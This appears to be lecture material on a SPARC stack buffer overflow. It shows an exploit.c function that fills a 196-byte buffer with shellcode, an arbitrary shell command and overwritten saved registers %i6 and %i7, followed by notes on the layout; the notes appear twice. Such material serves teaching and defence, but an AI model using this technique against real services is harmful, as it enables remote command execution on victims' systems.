Filling the Buffer

exploit.c

void fillbuffer(int fd, char * command) { char buffer[196]; int i; ssize_t nbytes; bzero(buffer, sizeof(buffer)); bcopy(code, buffer, CODESIZE); bcopy(command, buffer + CODESIZE, strlen(command) + 1); bcopy(links, buffer + sizeof buffer - 8, 8); if ((nbytes = write(fd, buffer, sizeof buffer)) != sizeof buffer) { fprintf(stderr, "unable to send exploit buffer\n"); } }

128 bytes for name, 4 bytes unused space, and 64 bytes for the saved registers sum up to 196 bytes.

The malicious code is placed at the beginning of the buffer.

To be flexible, our code executes an exec call with an arbitrary shell command.

Finally, we need some values for the saved copies of %i6 and %i7.

%i6 must not be 0. Otherwise, the victim would crash before the copy of %i7 would be used.

	128 bytes for name, 4 bytes unused space, and 64 bytes for the saved registers sum up to 196 bytes.
	The malicious code is placed at the beginning of the buffer.
	To be flexible, our code executes an exec call with an arbitrary shell command.
	Finally, we need some values for the saved copies of `%i6` and `%i7`.
	`%i6` must not be 0. Otherwise, the victim would crash before the copy of `%i7` would be used.